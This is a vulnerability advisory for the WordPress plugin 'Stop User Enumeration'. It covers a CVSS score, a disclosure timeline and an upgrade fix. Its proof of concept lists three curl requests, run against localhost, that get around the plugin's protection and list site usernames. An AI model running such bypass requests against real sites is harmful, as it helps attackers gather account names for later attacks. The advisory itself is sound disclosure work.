Stop User Enumeration does not stop user enumeration


Last revised:

Traditionally user enumeration of a WordPress site is done by making a series of requests to /?author=1 /?author=2 /?author=3 and so on (a similar effect can be achieved using POST requests too). WordPress 4.7 introduced a REST API endpoint to list all users.

This plugin attempts to prevent requests with an author parameter (but fails), and makes no attempt at preventing requests to the REST API.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 5 Medium
Vector Network
Complexity Low
Authentication None
Confidentiality Partial
Integrity None
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

There are three ways to bypass this plugin’s protections.

A GET request:

$ curl -i -s 'http://localhost/?wp-comments-post&author=1'
HTTP/1.1 301 Moved Permanently
Date: Fri, 23 Dec 2016 15:38:02 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/7.0.13
Location: http://localhost/author/tomdxw/?wp-comments-post
Content-Length: 0
Content-Type: text/html; charset=UTF-8

A POST request:

$ curl -s http://localhost/?wp-comments-post -d author=1 | grep '<title'
	<title>tomdxw – WP Test</title>

The REST API (new in WordPress 4.7):

$ curl -s http://localhost/wp-json/wp/v2/users

Advisory timeline

  • 2016-12-23: Discovered
  • 2016-12-23: Reported to vendor via
  • 2016-12-23: Requested CVE
  • 2016-12-23: Vendor first replied
  • 2017-01-03: Vendor reported issue fixed in version 1.3.5
  • 2017-01-04: Advisory published
  • 2017-08-23: Received CVE

Mitigation/further actions

Upgrade to version 1.3.5 or later.